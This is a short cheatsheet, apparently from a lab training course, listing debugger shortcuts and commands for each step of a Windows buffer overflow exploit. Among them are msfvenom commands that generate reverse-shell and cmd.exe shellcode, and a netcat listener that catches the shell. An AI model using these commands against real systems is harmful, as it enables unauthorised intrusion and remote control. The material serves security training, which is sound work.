
Windows Buffer Overflows Cheatsheet

Buffer Overflow Steps

  1. Fuzzing Parameters
  2. Controlling EIP
  3. Identifying Bad Characters
  4. Finding a Return Instruction
  5. Jumping to Shellcode


xfreerdp /v:<target IP address> /u:htb-student /p:<password>RDP to Windows VM
/usr/bin/msf-pattern_create -l 5000Create Pattern
/usr/bin/msf-pattern_offset -q 31684630Find Pattern Offset
netstat -a \|findstr LISTENList listening ports on a Windows machine
.\nc.exe 8888Interact with port
msfvenom -p 'windows/exec' CMD='cmd.exe' -f 'python' -b '\x00'Generate Local Privesc Shellcode
msfvenom -p 'windows/shell_reverse_tcp' LHOST= LPORT=1234 -f 'python' -b '\x00\0x0a'Generate Reverse Shell Shellcode
nc -lvnp 1234Listen for reverse shell
F3Open file
alt+AAttach to a process
alt+LGo to Logs Tab
alt+EGo to Symbols Tab
ctrl+fSearch for instruction
ctrl+bSearch for pattern
Search For>All Modules>CommandSearch all loaded modules for instruction
Search For>All Modules>PatternSearch all loaded modules for pattern
ERC --config SetWorkingDirectory C:\Users\htb-student\Desktop\Configure Working Directory
ERC --pattern c 5000Create Pattern
ERC --pattern o 1hF0Find Pattern Offset
ERC --bytearrayGenerate All Characters Byte Array
ERC --bytearray -bytes 0x00Generate Byte Array excluding certain bytes
ERC --compare 0014F974 C:\Users\htb-student\Desktop\ByteArray_1.binCompare bytes in memory to a Byte Array file
ERC --ModuleInfoList loaded modules and their memory protections
python -c "print('A'*10000)"Print fuzzing payload
python -c "print('A'*10000, file=open('fuzz.wav', 'w'))"Write fuzzing payload to a file
breakpoint()Add breakpoint to Python exploit
cContinue from breakpoint
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